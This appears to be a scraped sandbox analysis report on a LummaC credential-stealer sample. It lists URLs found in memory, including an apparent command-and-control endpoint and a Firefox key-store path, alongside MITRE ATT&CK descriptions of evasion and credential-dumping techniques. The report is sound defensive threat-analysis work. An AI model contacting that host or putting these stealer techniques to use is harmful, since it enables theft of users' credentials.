Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/9
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/E
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/Q
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/api
Source: AppLaunch.exe, 00000001.00000002.2141662418.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/api7gQA
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007B64000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/apiQ
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/apih
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/apiiF
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/apiq
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/bh1
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/e
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/ec
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/ia
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/ipA
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/m
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/pi
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/r
Source: AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun/x
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/api
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apiFirefox/fqs92o4p.default-release/key4.db
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apiL
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apietting_ai_detect=deleted;
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apireServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentic
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apitxt
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://suprafox.fun:80/apixt
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: AppLaunch.exe, 00000001.00000002.2141662418.000000000761E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: AppLaunch.exe, 00000001.00000002.2141662418.00000000075FB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: AppLaunch.exe, 00000001.00000002.2141662418.000000000761E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: AppLaunch.exe, 00000001.00000002.2141662418.00000000075FB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: AppLaunch.exe, 00000001.00000002.2139857505.0000000004F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
file.exe

Function 6D08B6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Function 060F0EB3 Relevance: 29.6, Strings: 23, Instructions: 800
COMMON

Function 6D07B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Function 6D082970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Function 6D07AF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Function 6D08D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Function 6D08D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Function 6D085140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Function 6D0844C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Function 6D08BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Function 6D0864D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Function 6D08CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Function 6D07A350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Function 6D08CD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Function 6D0849B0 Relevance: 15.2, APIs: 10, Instructions: 174
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre